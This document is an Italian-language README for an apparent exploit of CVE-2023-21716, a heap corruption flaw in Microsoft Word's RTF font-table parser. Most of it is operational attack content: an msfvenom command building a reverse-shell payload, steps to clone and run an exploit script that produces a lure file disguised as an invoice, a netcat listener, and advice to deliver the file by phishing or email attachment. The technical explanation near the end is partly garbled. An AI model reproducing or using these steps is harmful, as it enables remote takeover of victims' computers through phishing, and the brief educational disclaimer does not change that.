
CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload
Gravità: Critica (CVSS 9.8)
Interessato: Microsoft Word 2013 / 2016 / 2019 / 2021 (non aggiornato)
Patch: Microsoft Patch Tuesday di febbraio 2023
Autore: REGGYRAIDER
CVE-2023-21716 è una vulnerabilità di corruzione heap nel parser RTF di Microsoft Word (wwlib.dll).
Quando Word analizza una direttiva \fonttbl contenente più di 32.767 voci di font, un contatore interno a 16 bit con segno va in overflow, corrompendo i metadati dell'heap. Ciò consente a un attaccante di ottenere esecuzione di codice remoto semplicemente inviando alla vittima un file .rtf appositamente creato.
Niente macro. Nessuna interazione utente oltre all'apertura del file.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
Carica tramite SMB, allegato email o qualsiasi vettore di phishing.
Quando la vittima apre invoice_march2024.rtf in un Word non aggiornato, ricevi una reverse shell.
L'attaccante crea RTF Word analizza \fonttbl Heap corrotto
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl con 32769+ Contatore a 16 bit segno Dell'attaccante
definizioni di font overflow → 0x8000 shellcode eseguito
\f<N> all'interno di \fonttbl.payload.bin) viene inserito all'interno di \pict e finisce nella regione corrotta, ottenendo l'esecuzione quando l'allocatore lo elabora.Questo strumento è inteso solo per scopi educativi e test di penetrazione autorizzati.
Usare questo exploit contro sistemi di cui non si possiede o non si ha esplicita autorizzazione scritta per testare è illegale.
L'autore non si assume alcuna responsabilità per un uso improprio.